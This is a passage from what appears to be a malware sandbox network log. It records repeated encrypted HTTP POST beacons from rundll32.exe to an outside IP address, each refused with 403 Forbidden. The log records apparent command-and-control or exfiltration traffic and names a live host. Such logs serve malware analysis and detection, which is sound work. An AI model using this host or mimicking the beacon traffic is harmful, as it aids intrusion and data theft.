2021-10-28 02:58:32 UTC | 79 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:33 UTC | 84 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:33 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 49825 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:35 UTC | 84 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:35 UTC | 84 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:36 UTC | 89 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:36 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 49827 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:36 UTC | 89 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:36 UTC | 89 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:37 UTC | 94 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:37 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 49833 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:39 UTC | 94 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:39 UTC | 94 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:40 UTC | 99 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:40 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49758 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:04 UTC | 9 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:04 UTC | 10 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:05 UTC | 14 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:05 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.6 | 49836 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:40 UTC | 99 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:40 UTC | 99 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:41 UTC | 104 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:41 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.6 | 49840 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:43 UTC | 104 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:43 UTC | 104 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:44 UTC | 109 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:44 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.6 | 49844 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:46 UTC | 109 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:46 UTC | 109 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:46 UTC | 114 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:46 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.6 | 49848 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:47 UTC | 114 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:47 UTC | 114 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:48 UTC | 119 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:48 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.6 | 49852 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:49 UTC | 119 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:49 UTC | 119 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:50 UTC | 124 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:50 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.6 | 49856 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:51 UTC | 124 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:51 UTC | 124 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:52 UTC | 129 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:52 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.6 | 49862 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:53 UTC | 129 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:53 UTC | 129 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:54 UTC | 134 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:54 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.6 | 49866 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:55 UTC | 134 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:55 UTC | 134 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:56 UTC | 139 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:55 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.6 | 49871 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:57 UTC | 139 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:57 UTC | 139 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:58 UTC | 144 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:58 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.6 | 49874 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:59 UTC | 144 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
